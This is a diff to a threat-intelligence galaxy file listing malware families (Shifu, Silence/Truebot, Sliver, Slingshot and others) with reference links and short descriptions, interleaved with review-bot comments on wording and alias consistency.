- "dest-uuid": "9ea6d29e-00a7-4042-9bc5-31b1adeee6ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d00c8f94-d6b5-40b7-b167-fc546c5dec38",
"value": "Shark"
},
@@ -41481,15 +43698,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "203fd529-6382-417e-a68f-7565fbf89ece",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
"value": "SHARPKNOT"
},
@@ -41553,7 +43761,7 @@
"value": "ShellClient RAT"
},
{
- "description": "",
+ "description": "PCRIsk states that ShellLocker is a ransomware-type virus developed using .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.\r\n\r\nFollowing infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the \"[random_characters].L0cked\" pattern (e.g., \"sample.jpg\" might be renamed to \"gd&=AA0fgoi.L0cked\"). Following successful encryption, ShellLocker opens a pop-up window containing ransom-demand message.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker",
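Review bot: the new description opens with "PCRIsk states that" while the other PCrisk-sourced description added in this patch (the Silence entry) uses "According to PCrisk,"; pick one attribution phrasing, and spell the vendor PCrisk consistently. The last sentence is also missing an article: "opens a pop-up window containing a ransom-demand message".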
@@ -41570,26 +43778,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
+ "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
- "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "67d712c8-d254-4820-83fa-9a892b87923b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3",
"value": "Shifu"
},
@@ -41598,8 +43797,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat",
- "https://www.secureworks.com/research/threat-profiles/bronze-walker",
- "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf"
+ "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-walker"
],
"synonyms": [],
"type": []
@@ -41612,8 +43811,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -41652,14 +43851,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock",
- "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
- "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
- "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
"https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
- "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/"
+ "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw",
+ "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
+ "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis",
+ "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
+ "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html"
],
"synonyms": [
"Caphaw"
@@ -41688,8 +43888,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk",
"https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware"
],
"synonyms": [
"ScrambleCross"
@@ -41704,15 +43904,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
- "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
+ "https://www.secrss.com/articles/26507",
"https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/",
"https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c",
- "https://s.tencent.com/research/report/479.html",
- "https://www.secrss.com/articles/26507",
+ "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/",
+ "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
"https://s.tencent.com/research/report/659.html",
- "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/"
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
+ "https://s.tencent.com/research/report/479.html"
],
"synonyms": [],
"type": []
@@ -41726,7 +43926,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_blue",
"https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware",
- "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/"
+ "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF"
],
"synonyms": [
"H0lyGh0st",
@@ -41743,7 +43944,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple",
"https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware",
- "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/"
+ "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF"
],
"synonyms": [
"H0lyGh0st",
@@ -41759,14 +43961,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://www.us-cert.gov/ncas/alerts/TA14-353A"
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
+ "https://www.us-cert.gov/ncas/alerts/TA14-353A",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware"
],
"synonyms": [
"Destover"
@@ -41776,6 +43979,21 @@
"uuid": "da92c927-9b31-48aa-854a-8ed49a29565b",
"value": "Sierra(Alfa,Bravo, ...)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siesta_graph",
+ "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph",
+ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4f4464a-a8d6-4244-af0a-4a8163ab9f47",
+ "value": "SiestaGraph"
+ },
{
"description": "",
"meta": {
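Review bot: the first Elastic ref in the new SiestaGraph entry uses the German-locale path ("https://www.elastic.co/de/security-labs/naplistener-...") while the other two Elastic refs use the locale-free "/security-labs/" path; if the article is also served at the locale-free path, use that form for consistency. The entry also ships with an empty description even though three Elastic write-ups are linked; a one-line summary would make the cluster usable in the galaxy view.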
@@ -41788,6 +44006,19 @@
"uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8",
"value": "Siggen6"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sigloader",
+ "https://www.lac.co.jp/lacwatch/report/20201201_002363.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48bf4991-4743-404a-aac1-72855b30e225",
+ "value": "SigLoader"
+ },
{
"description": "",
"meta": {
@@ -41802,41 +44033,52 @@
"value": "sihost"
},
{
- "description": "",
+ "description": "According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).\r\n\r\nThere is significant variation in Truebot's infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.silence",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf",
"https://securelist.com/the-silence/83009/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "http://www.intezer.com/silenceofthemoles/",
+ "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/",
+ "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere",
"https://reaqta.com/2019/01/silence-group-targeting-russian-banks/",
"https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
- "https://github.com/Tera0017/TAFOF-Unpacker",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.group-ib.com/resources/threat-research/silence.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html",
+ "http://www.intezer.com/silenceofthemoles/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html",
"https://norfolkinfosec.com/some-notes-on-the-silence-proxy/",
- "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/"
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.group-ib.com/resources/threat-research/silence.html",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"
],
"synonyms": [
"TrueBot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "304fd753-c917-4008-8f85-81390c37a070",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0df52c23-690b-4703-83f7-5befc38ab376",
"value": "Silence"
},
+ {
+ "description": "According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentuploader",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ed237f1-35b9-4e74-a37e-966bf023d136",
+ "value": "SILENTUPLOADER"
+ },
{
"description": "",
"meta": {
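Review bot: the new Silence description introduces a second alias ("Truebot, also known as Silence.Downloader") but the `synonyms` array still lists only "TrueBot"; add "Silence.Downloader" so that name resolves to this cluster, and settle on one casing ("TrueBot" in synonyms versus "Truebot" in the description), since synonym matching is a plain string comparison.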
@@ -41901,14 +44143,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.recordedfuture.com/turla-apt-infrastructure/",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan",
+ "https://en.wikipedia.org/wiki/Torpig",
+ "https://www.recordedfuture.com/turla-apt-infrastructure/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
"https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/",
- "https://en.wikipedia.org/wiki/Torpig"
+ "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2"
],
"synonyms": [
"Anserin",
@@ -41928,8 +44170,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/",
- "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4"
+ "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/"
],
"synonyms": [],
"type": []
@@ -41984,15 +44226,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper",
- "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf",
- "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/"
],
"synonyms": [
"Kotel"
@@ -42014,6 +44256,19 @@
"uuid": "39002a0d-99aa-4568-b110-48f6df1759cd",
"value": "Skyplex"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slam",
+ "https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "400e437d-13b3-44d9-8f75-34f5e82d6c88",
+ "value": "Slam"
+ },
{
"description": "",
"meta": {
@@ -42042,14 +44297,14 @@
"value": "SLICKSHOES"
},
{
- "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer",
+ "description": "- 2012 first sighted\r\n- Attack vector via compromised Mikrotik routers where victims get infection when they connect to Mikrotik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Mikrotik Router > Malicious DLL (IP4.dll) in Router > User connect via winbox > Malicious DLL downloaded on computer",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot",
"https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
"https://securelist.com/apt-slingshot/84312/",
- "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf",
- "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/"
+ "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/",
+ "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf"
],
"synonyms": [],
"type": []
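Review bot: the Microtik/windbox spelling fixes are correct, but the rewritten line now spells the tool "Winbox" in the attack-vector bullet and "winbox" in the infection-vector line; use one casing. While the description is being touched, the remaining grammar could be tidied in the same change: "victims get infection when they connect to" reads better as "victims were infected when they connected to", and "2018 when discovered by Kaspersky Team" as "2018: discovered by Kaspersky".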
@@ -42058,17 +44313,23 @@
"value": "Slingshot"
},
{
- "description": "",
+ "description": "According to VK9 Seecurity, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver",
- "https://github.com/BishopFox/sliver",
- "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf",
- "https://www.telsy.com/download/5900/?uid=b797afdcfb",
- "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
"https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
- "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/"
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://asec.ahnlab.com/en/47088/",
+ "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf",
+ "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
+ "https://github.com/BishopFox/sliver",
+ "https://www.telsy.com/download/5900/?uid=b797afdcfb",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://github.com/chronicle/GCTI",
+ "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/",
+ "https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/"
],
"synonyms": [],
"type": []
@@ -42076,13 +44337,26 @@
"uuid": "654c478e-3c9a-4fd9-a9b7-dd6839f51147",
"value": "Sliver"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slnrat",
+ "https://asec.ahnlab.com/ko/37764/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "68bb36d3-d078-483d-b559-e0d8da5f45fe",
+ "value": "slnrat"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a",
- "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+ "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
],
"synonyms": [
"QueenOfClubs"
@@ -42099,9 +44373,9 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slub",
"https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html",
"https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
- "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf",
+ "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html"
],
"synonyms": [],
"type": []
@@ -42114,8 +44388,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smac",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-express"
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf"
],
"synonyms": [
"speccom"
@@ -42143,18 +44417,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1",
- "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
- "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html",
- "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
"https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4",
+ "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/",
+ "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
+ "https://blog.group-ib.com/task",
+ "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html",
+ "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1",
"https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html",
"https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
- "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
- "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
+ "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
"https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214",
- "https://blog.group-ib.com/task"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"PhantomNet"
@@ -42182,8 +44456,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug",
- "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service",
"https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/",
+ "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html"
],
"synonyms": [],
@@ -42197,8 +44471,8 @@
"meta": {
"refs": [
